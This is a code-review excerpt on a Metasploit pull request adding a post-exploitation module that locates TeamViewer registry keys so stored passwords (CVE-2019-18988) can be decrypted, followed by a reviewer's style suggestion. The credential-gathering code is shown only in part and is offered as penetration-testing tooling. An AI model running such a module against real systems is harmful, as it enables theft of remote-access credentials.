modules/post/windows/gather/credentials/teamviewer_passwords.rb

```diff
@@ -0,0 +1,143 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+#
+# @blurbdust based this code off of https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb
+# and https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/enum_ms_product_keys.rb
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::Windows::Registry
+
+  def initialize(info={})
+    super(update_info(info,
+        'Name'          => 'Windows Gather TeamViewer Passwords',
+        'Description'   => %q{ This module will find and decrypt stored TeamViewer keys },
+        'License'       => MSF_LICENSE,
+        'References'    => [ ['CVE', '2019-18988'], [ 'URL', 'https://whynotsecurity.com/blog/teamviewer/'] ],
+        'Author'        => [ 'Nic Losby <blurbdust[at]gmail.com>'],
+        'Platform'      => [ 'win' ],
+        'SessionTypes'  => [ 'meterpreter' ]
+      ))
+  end
+
+  def app_list
+    results = ""
+    keys = [
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version7", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version8", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version9", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version10", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version11", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version12", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version13", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version14", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version15", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer", "Version" ],
+      [ "HKLM\\SOFTWARE\\TeamViewer\\Temp", "SecurityPasswordExported" ],
+      [ "HKLM\\SOFTWARE\\TeamViewer", "Version" ],
+    ]
+
+    keys.each do |keyx86|
+
+      #parent key
+      p = keyx86[0,1].join
+
+      #child key
+      c = keyx86[1,1].join
```

Comment:
You can unpack the multi-dimensional array in the loop definition by doing:
```
keys.each do |parent_key, child_key|
```

This would also help avoid one letter variable names which we'd like to do where feasible.